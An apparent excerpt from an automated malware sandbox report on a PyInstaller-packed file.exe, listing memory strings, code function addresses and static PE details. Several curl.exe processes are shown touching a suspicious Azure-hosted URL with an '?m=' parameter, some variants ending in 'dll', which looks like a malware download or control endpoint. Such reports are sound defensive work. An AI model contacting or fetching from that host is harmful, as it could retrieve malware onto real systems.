Source: curl.exe, 0000001D.00000002.2509049134.0000020D856D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=8351803
Source: curl.exe, 00000013.00000002.2196917776.0000027F4B1C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180A
Source: curl.exe, 00000016.00000002.2300773885.0000021670889000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180Bi
Source: curl.exe, 00000016.00000002.2300773885.0000021670889000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180E&
Source: curl.exe, 0000000D.00000003.1986647972.000002C391116000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180K=
Source: curl.exe, 0000000D.00000003.1986647972.000002C391116000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180L=
Source: curl.exe, 00000020.00000002.2614033596.00000268D07A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180P2
Source: curl.exe, 0000001D.00000002.2509049134.0000020D856D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180P2l
Source: curl.exe, 00000019.00000002.2405619133.0000017D4E417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180PZ
Source: curl.exe, 00000016.00000002.2300773885.0000021670889000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180Q&
Source: curl.exe, 00000029.00000002.2934470574.0000019D78D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180Q2
Source: curl.exe, 00000029.00000002.2934470574.0000019D78D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180V2R
Source: curl.exe, 00000023.00000003.2717943243.0000026064D46000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000003.2717378662.0000026064D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180XZ
Source: curl.exe, 00000026.00000002.2825899074.000002913BBA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180YD
Source: curl.exe, 0000001D.00000002.2509049134.0000020D856D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180Z2f
Source: curl.exe, 00000016.00000002.2300773885.0000021670889000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180_&
Source: curl.exe, 00000019.00000002.2405619133.0000017D4E417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180cZ
Source: curl.exe, 00000007.00000002.1882730514.000001DC607C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091064539.0000023561B53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091103305.0000023561B56000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.2196917776.0000027F4B1C4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2509049134.0000020D856D8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000002.2614033596.00000268D07A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180dll
Source: curl.exe, 0000000D.00000003.1986647972.000002C391116000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180dll(=j
Source: curl.exe, 00000010.00000003.2091064539.0000023561B53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091103305.0000023561B56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180dllL_
Source: curl.exe, 00000004.00000002.1778152644.0000016B7F679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180dllMe-
Source: curl.exe, 00000016.00000002.2300773885.0000021670889000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180dllT&
Source: curl.exe, 0000000D.00000003.1986647972.000002C391116000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180dlld=V
Source: curl.exe, 0000001D.00000002.2509049134.0000020D856D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180dlly3
Source: curl.exe, 00000029.00000002.2934470574.0000019D78D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180g2C
Source: curl.exe, 00000023.00000003.2717943243.0000026064D46000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000003.2717378662.0000026064D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180i
Source: curl.exe, 00000019.00000002.2405619133.0000017D4E417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180iZ
Source: curl.exe, 00000007.00000002.1882730514.000001DC607C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180l
Source: curl.exe, 00000023.00000003.2717943243.0000026064D46000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000003.2717378662.0000026064D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180lAZ
Source: curl.exe, 00000023.00000003.2717943243.0000026064D46000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000003.2717378662.0000026064D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180ooth
Source: curl.exe, 00000016.00000002.2300773885.0000021670889000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180s&
Source: curl.exe, 00000004.00000002.1778152644.0000016B7F679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180ud
Source: curl.exe, 0000000D.00000003.1986647972.000002C391116000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180x=
Source: file.exe, 00000001.00000003.1767658653.0000024624E9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1770016415.0000024624EA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1755492210.0000019DE7D2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757299329.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749386479.0000019DE7D2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000001.00000003.1767658653.0000024624E9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1770016415.0000024624EA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: file.exe, 00000001.00000003.1767658653.0000024624E9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1770016415.0000024624EA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: file.exe, 00000001.00000003.1769014972.0000024622F93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1760626669.0000024624C21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1766974952.0000024622F9D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1765110728.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764792973.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764029258.0000024622F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3015317587.0000024622F36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: file.exe, 00000001.00000002.3015474672.00000246247D8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.1760626669.0000024624C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: file.exe, 00000001.00000002.3015317587.0000024622F36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: file.exe, 00000001.00000003.1769014972.0000024622F93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1760626669.0000024624C21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1766974952.0000024622F9D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1765110728.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764792973.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764029258.0000024622F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3015317587.0000024622F36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: file.exe, 00000001.00000003.1769014972.0000024622F93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1760626669.0000024624C21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1766974952.0000024622F9D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1765110728.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764792973.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764029258.0000024622F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3015317587.0000024622F36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: file.exe, 00000001.00000002.3015867806.0000024624D20000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://peps.python.org/pep-0205/
Source: file.exe, 00000001.00000002.3017300090.00007FFDFB4CC000.00000002.00000001.01000000.00000005.sdmp, python311.dll.0.dr	String found in binary or memory: https://peps.python.org/pep-0263/
Source: libcrypto-1_1.dll.0.dr	String found in binary or memory: https://www.openssl.org/H
Source: file.exe, 00000001.00000003.1762993421.0000024624C67000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3015474672.0000024624750000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.1762436129.0000024624C66000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: file.exe, 00000001.00000002.3017506352.00007FFDFB569000.00000004.00000001.01000000.00000005.sdmp, python311.dll.0.dr	String found in binary or memory: https://www.python.org/psf/license/

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D5C74	0_2_00007FF6399D5C74
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399B1000	0_2_00007FF6399B1000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399B8B20	0_2_00007FF6399B8B20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C0A60	0_2_00007FF6399C0A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D8A38	0_2_00007FF6399D8A38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C7AAC	0_2_00007FF6399C7AAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C1280	0_2_00007FF6399C1280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399CD200	0_2_00007FF6399CD200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C91B0	0_2_00007FF6399C91B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D518C	0_2_00007FF6399D518C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C2CC4	0_2_00007FF6399C2CC4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C0C64	0_2_00007FF6399C0C64
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C1484	0_2_00007FF6399C1484
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399CFBD8	0_2_00007FF6399CFBD8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C73F4	0_2_00007FF6399C73F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D33BC	0_2_00007FF6399D33BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D0B84	0_2_00007FF6399D0B84
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D2F20	0_2_00007FF6399D2F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C1F30	0_2_00007FF6399C1F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399CFBD8	0_2_00007FF6399CFBD8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D5728	0_2_00007FF6399D5728
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399D4F10	0_2_00007FF6399D4F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C0E70	0_2_00007FF6399C0E70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399B95FB	0_2_00007FF6399B95FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399CCD6C	0_2_00007FF6399CCD6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C28C0	0_2_00007FF6399C28C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C1074	0_2_00007FF6399C1074
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399C5040	0_2_00007FF6399C5040
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399CD880	0_2_00007FF6399CD880
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399B9FCD	0_2_00007FF6399B9FCD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6399B979B	0_2_00007FF6399B979B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D5C74	1_2_00007FF6399D5C74
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D4F10	1_2_00007FF6399D4F10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399B95FB	1_2_00007FF6399B95FB
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399B1000	1_2_00007FF6399B1000
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399B8B20	1_2_00007FF6399B8B20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C0A60	1_2_00007FF6399C0A60
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D8A38	1_2_00007FF6399D8A38
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C7AAC	1_2_00007FF6399C7AAC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C1280	1_2_00007FF6399C1280
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399CD200	1_2_00007FF6399CD200
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C91B0	1_2_00007FF6399C91B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D518C	1_2_00007FF6399D518C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C2CC4	1_2_00007FF6399C2CC4
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C0C64	1_2_00007FF6399C0C64
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C1484	1_2_00007FF6399C1484
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399CFBD8	1_2_00007FF6399CFBD8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C73F4	1_2_00007FF6399C73F4
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D33BC	1_2_00007FF6399D33BC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D0B84	1_2_00007FF6399D0B84
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D2F20	1_2_00007FF6399D2F20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C1F30	1_2_00007FF6399C1F30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399CFBD8	1_2_00007FF6399CFBD8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399D5728	1_2_00007FF6399D5728
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C0E70	1_2_00007FF6399C0E70
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399CCD6C	1_2_00007FF6399CCD6C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C28C0	1_2_00007FF6399C28C0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C1074	1_2_00007FF6399C1074
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399C5040	1_2_00007FF6399C5040
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399CD880	1_2_00007FF6399CD880
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399B9FCD	1_2_00007FF6399B9FCD
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FF6399B979B	1_2_00007FF6399B979B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF163F70	1_2_00007FFDFF163F70
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF15FFC4	1_2_00007FFDFF15FFC4
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF168FC8	1_2_00007FFDFF168FC8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1C1E94	1_2_00007FFDFF1C1E94
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1CCE78	1_2_00007FFDFF1CCE78
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF155E2A	1_2_00007FFDFF155E2A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF177B1C	1_2_00007FFDFF177B1C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF170AFA	1_2_00007FFDFF170AFA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF167B40	1_2_00007FFDFF167B40
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF206B2C	1_2_00007FFDFF206B2C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1549C4	1_2_00007FFDFF1549C4
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF164A18	1_2_00007FFDFF164A18
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF15F890	1_2_00007FFDFF15F890
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF15C820	1_2_00007FFDFF15C820
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF17A700	1_2_00007FFDFF17A700
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF169720	1_2_00007FFDFF169720
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF17173B	1_2_00007FFDFF17173B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF16B5D0	1_2_00007FFDFF16B5D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1585EA	1_2_00007FFDFF1585EA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF15C4C9	1_2_00007FFDFF15C4C9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1834D0	1_2_00007FFDFF1834D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1714A4	1_2_00007FFDFF1714A4
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF15D4A0	1_2_00007FFDFF15D4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF16A4A8	1_2_00007FFDFF16A4A8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF16D500	1_2_00007FFDFF16D500
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF177550	1_2_00007FFDFF177550
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1ED520	1_2_00007FFDFF1ED520
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF168410	1_2_00007FFDFF168410
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF160450	1_2_00007FFDFF160450
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF197288	1_2_00007FFDFF197288
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF15C290	1_2_00007FFDFF15C290
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF169349	1_2_00007FFDFF169349
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFDFF1760AA	1_2_00007FFDFF1760AA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE14631060	1_2_00007FFE14631060
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE1A497778	1_2_00007FFE1A497778
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE1A499620	1_2_00007FFE1A499620

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF6399B25F0 appears 100 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00007FF6399B2760 appears 36 times

Source: unicodedata.pyd.0.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-fibers-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: file.exe, 00000000.00000003.1752494159.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1751234279.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1748229034.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs file.exe
Source: file.exe, 00000000.00000003.1749812781.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1754116826.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs file.exe
